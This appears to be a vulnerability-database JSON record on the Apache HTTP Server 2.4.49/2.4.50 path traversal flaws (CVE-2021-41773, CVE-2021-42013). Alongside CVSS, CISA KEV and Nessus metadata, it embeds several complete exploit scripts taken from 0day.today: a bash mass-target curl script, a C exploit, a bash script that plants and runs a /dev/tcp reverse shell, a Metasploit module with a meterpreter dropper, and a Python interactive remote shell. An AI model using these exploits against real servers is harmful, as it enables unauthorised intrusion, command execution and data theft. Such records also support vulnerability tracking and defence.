false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773", "CVE-2020-17519"], "modified": "2022-02-28T17:25:24", "id": "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Apache HTTP server vulnerabilities allow an attacker to use a path traversal attack to map URLs to files outside the expected document root and perform Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-42013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-41773", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2021-12-03T01:52:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "1337DAY-ID-36897", "href": "https://0day.today/exploit/description/36897", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 == '' ]]; [[ $2 == '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n", "sourceHref": "https://0day.today/exploit/36897", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T08:00:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Apache 2.4.50 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37777", "href": "https://0day.today/exploit/description/37777", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <string.h>\n#include <curl/curl.h>\n\n/* Apache 2.4.50 exploit (CVE-2021-42013)\n * Author: Vilius Povilaika\n * Website: www.povilaika.com */\n\n// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013\n\nint usage(char* prog)\n{\n printf(\"Usage: %s <host> <exec>\\n\", prog);\n printf(\" - %s https://127.0.0.1 \\\"uname -a\\\"\\n\", prog);\n return 0;\n}\n\nbool error(const char* reason)\n{\n printf(\"[ERR] Critical error - %s\\n\", reason);\n return false;\n}\n\nstruct callback_result {\n char* data;\n size_t size;\n};\n\nstatic size_t callback(void* pointer, size_t size, size_t nmemb, void* data)\n{\n struct callback_result *memory = (struct callback_result *)data;\n char* ptr = realloc(memory->data, memory->size+nmemb+1);\n memory->data = ptr;\n memcpy(&(memory->data[memory->size]), pointer, nmemb);\n memory->size += nmemb;\n memory->data[memory->size] = 0;\n return nmemb;\n}\n\nbool exploit(void* result, char* host, char* exec)\n{\n CURL *curl = curl_easy_init();\n char url[256];\n sprintf(url, \"%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh\", host);\n curl_easy_setopt(curl, CURLOPT_URL, url);\n char payload[256];\n sprintf(payload, \"echo Content-Type: text/plain; echo; %s\", exec);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);\n curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);\n curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);\n int res = curl_easy_perform(curl);\n if (res != CURLE_OK)\n return error(curl_easy_strerror(res));\n curl_easy_cleanup(curl);\n return true;\n}\n\nint main(int argc, char* argv[])\n{\n if (argc != 3)\n return usage(argv[0]);\n struct callback_result result = {0};\n bool res = exploit(&result, argv[1], argv[2]);\n if (res)\n printf(\"[+] Exploit finished successfully, check output\\n\");\n else\n printf(\"[-] Exploit failed, check output\\n\");\n printf(\" \\n%s\\n\", result.data);\n return 0;\n}\n", "sourceHref": "https://0day.today/exploit/37777", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-16T05:38:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36937", "href": "https://0day.today/exploit/description/36937", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\n# Credits: Ash Daulton & cPanel Security Team\n# Exploit Author: TheLastVvV.com\n# Vendor Homepage: https://apache.org/\n# Version: Apache 2.4.50 with CGI enable\n# Tested on : Debian 5.10.28\n# CVE : CVE-2021-42013\n\n#!/bin/bash\n\necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'\nif [ $# -eq 0 ]\nthen\necho \"try: ./$0 http://ip:port LHOST LPORT\"\nexit 1\nfi\ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\"\n\n#usage chmod -x CVE-2021-42013.sh\n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT\n", "sourceHref": "https://0day.today/exploit/36937", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-23T13:19:11", "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36952", "href": "https://0day.today/exploit/description/36952", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:49:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37030", "href": "https://0day.today/exploit/description/37030", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://apache.org/\n# Software Link: https://github.com/Balgogan/CVE-2021-41773\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\n# Tested on: Debian GNU/Linux\n# CVE : CVE-2021-41773 / CVE-2021-42013\n# Credits : Lucas Schnell\n\n\n#!/usr/bin/env python3\n#coding: utf-8\n\nimport os\nimport re\nimport sys\nimport time\nimport requests\nfrom colorama import Fore,Style\n\n\nheader = '''\\033[1;91m\n \n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL\n\n\nif len(sys.argv) < 2 :\n print( 'Use: python3 file.py ip:port ' )\n sys.exit()\n\ndef end():\n print(\"\\t\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\ndef commands(url,command,session):\n directory = mute_command(url,'pwd')\n user = mute_command(url,'whoami')\n hostname = mute_command(url,'hostname')\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \n command = f\"echo; {command};\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n print(output)\n if 'clear' in command:\n os.system('/usr/bin/clear')\n print(header)\n if 'exit' in command:\n end()\n\ndef mute_command(url,command):\n session = requests.Session()\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n return response.text.strip()\n\n\ndef exploitRCE(payload):\n s = requests.Session()\n try:\n host = sys.argv[1]\n if 'http' not in host:\n url = 'http://'+ host + payload\n else:\n url = host + payload \n session = requests.Session()\n command = \"echo; id\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n if \"uid\" in output:\n choice = \"Y\"\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \")\n if choice.lower() in ['','y','yes']:\n while True:\n commands(url,command,session) \n else:\n end() \n else :\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\n except KeyboardInterrupt:\n end()\n\ndef main():\n try:\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\n payloads = [apache2449_payload,apache2450_payload]\n choice = len(payloads) + 1\n print(header)\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\n while choice >= len(payloads) and choice >= 0:\n choice = int(input('[~] Choice : '))\n if choice < len(payloads):\n exploitRCE(payloads[choice])\n except KeyboardInterrupt:\n print(\"\\n\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/37030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-03-09T15:30:20", "description": "The instance of Apache HTTP Server running on the remote host is affected by a path traversal vulnerability. A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T00:00:00", "type": "nessus", "title": "Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "href": "https://www.tenable.com/plugins/nessus/155600", "sourceData": "Binary data apache_2_4_50_path_traversal.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49 or 2.4.50. It is, therefore, affected by a path traversal vulnerability. The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", 